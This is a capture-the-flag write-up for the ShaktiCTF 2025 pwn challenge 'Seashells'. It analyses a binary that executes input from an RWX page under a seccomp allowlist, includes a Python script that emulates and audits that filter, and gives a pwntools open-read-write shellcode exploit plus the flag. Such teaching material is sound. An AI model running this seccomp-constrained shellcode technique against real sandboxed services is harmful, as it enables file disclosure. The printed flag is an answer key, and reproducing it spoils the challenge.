[ShaktiCTF 2025][Pwn] Seashells

Type: CTF
Year: 2025
Name: ShaktiCTF
Category: System
Subcategory: Seccomp
2025/07/28 00:55

# Description

She picks seashells by the seashore. But she is very picky with what she keeps. Author: omelette_keychain

# Analysis

Looking at the code, the data read into buf is copied to dest, and the code at dest is then executed.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rdx
  int v5; // [rsp+14h] [rbp-52Ch]
  void *dest; // [rsp+20h] [rbp-520h]
  _BYTE buf[1288]; // [rsp+30h] [rbp-510h] BYREF
  unsigned __int64 v8; // [rsp+538h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  seccomp_initialisation(argc, argv, envp);   // installs the syscall filter before any input is read
  v3 = strlen("Give me the sea shells that you collected >>");
  write(1, "Give me the sea shells that you collected >>", v3);
  if ( (unsigned int)read(0, buf, 0x500u) == -1 )
  {
    perror("read failed");
    return -1;
  }
  else
  {
    v5 = sysconf(30);                         // 30 = _SC_PAGESIZE
    dest = mmap(0, v5, 7, 34, -1, 0);         // prot 7 = R|W|X, flags 34 = MAP_PRIVATE|MAP_ANONYMOUS
    if ( dest == (void *)-1LL )
    {
      perror("mmap failed");
      return -1;
    }
    else
    {
      memcpy(dest, buf, v5);
      ((void (*)(void))dest)();               // the copied input is executed as code
      munmap(dest, v5);
      return 0;
    }
  }
}
```
This can be treated as a simple shellcoding challenge, with seccomp_initialisation filtering syscalls.
Avoiding the filtered syscalls makes it possible to get a shell.

seccomp-tools output

```text
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0c 0xc000003e  if (A != ARCH_X86_64) goto 0014
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x09 0xffffffff  if (A != 0xffffffff) goto 0014
 0005: 0x15 0x07 0x00 0x00000000  if (A == read) goto 0013
 0006: 0x15 0x06 0x00 0x00000001  if (A == write) goto 0013
 0007: 0x15 0x05 0x00 0x00000002  if (A == open) goto 0013
 0008: 0x15 0x04 0x00 0x00000003  if (A == close) goto 0013
 0009: 0x15 0x03 0x00 0x00000009  if (A == mmap) goto 0013
 0010: 0x15 0x02 0x00 0x0000000b  if (A == munmap) goto 0013
 0011: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0013
 0012: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x06 0x00 0x00 0x00000000  return KILL
```

Exploit approach

The challenge is to obtain the flag using read, write, open, and close.
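
The filter dump above can be checked mechanically instead of by eye. The following is an added example, not part of the original write-up: it interprets the four BPF opcodes that appear in the dump and enumerates what the allowlist permits. The function names and the wording of the audit findings are assumptions made for illustration.

```python
# Added example (not from the original write-up): audit the seccomp filter above.
AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_RET_ALLOW = 0x7FFF0000
SECCOMP_RET_KILL = 0x00000000

# (code, jt, jf, k) rows copied from the seccomp-tools dump on this page.
FILTER = [
    (0x20, 0, 0, 0x00000004), (0x15, 0, 12, 0xC000003E),   # 0000-0001
    (0x20, 0, 0, 0x00000000), (0x35, 0, 1, 0x40000000),    # 0002-0003
    (0x15, 0, 9, 0xFFFFFFFF), (0x15, 7, 0, 0x00000000),    # 0004-0005
    (0x15, 6, 0, 0x00000001), (0x15, 5, 0, 0x00000002),    # 0006-0007
    (0x15, 4, 0, 0x00000003), (0x15, 3, 0, 0x00000009),    # 0008-0009
    (0x15, 2, 0, 0x0000000B), (0x15, 1, 0, 0x0000003C),    # 0010-0011
    (0x15, 0, 1, 0x000000E7), (0x06, 0, 0, 0x7FFF0000),    # 0012-0013
    (0x06, 0, 0, 0x00000000),                              # 0014
]

def run_filter(nr, arch=AUDIT_ARCH_X86_64):
    """Interpret the classic-BPF subset this filter uses; return its RET value."""
    data = {0: nr & 0xFFFFFFFF, 4: arch}  # seccomp_data: nr at offset 0, arch at 4
    a, pc = 0, 0
    while True:
        code, jt, jf, k = FILTER[pc]
        pc += 1
        if code == 0x20:    # BPF_LD | BPF_W | BPF_ABS: A = data[k]
            a = data[k]
        elif code == 0x15:  # BPF_JMP | BPF_JEQ | BPF_K
            pc += jt if a == k else jf
        elif code == 0x35:  # BPF_JMP | BPF_JGE | BPF_K
            pc += jt if a >= k else jf
        elif code == 0x06:  # BPF_RET | BPF_K
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")

def allowed_syscalls(limit=512):
    """Syscall numbers below `limit` that the filter allows on x86-64."""
    return [nr for nr in range(limit) if run_filter(nr) == SECCOMP_RET_ALLOW]

def audit():
    """Policy review: which capabilities does the allowlist leave to untrusted code?"""
    allowed, findings = set(allowed_syscalls()), []
    if {0, 1, 2} <= allowed:  # read, write, open
        findings.append("open+read+write allowed: readable files can be disclosed")
    if not {59, 322} & allowed:  # execve, execveat
        findings.append("execve/execveat blocked: no new program can be started")
    return findings

if __name__ == "__main__":
    print(allowed_syscalls())
    print(*audit(), sep="\n")
```

The filter inspects only the architecture and the syscall number, so the path passed to open is not constrained by it.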

# Payload

```python
from pwn import *

filename = "./seashells"
e = ELF(filename)
p = process(filename)
context.arch = 'amd64'

# Shellcode restricted to the allowed syscalls:
# open("./flag"), read it onto the stack, write it to stdout.
shellcode = shellcraft.pushstr("./flag")
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode = asm(shellcode)

p.sendlineafter(b" >>", shellcode)
p.interactive()
```

# Flag

shaktictf{u_g0t_wh@t_u_w15h3d__th3_s3@sh311_f1@g}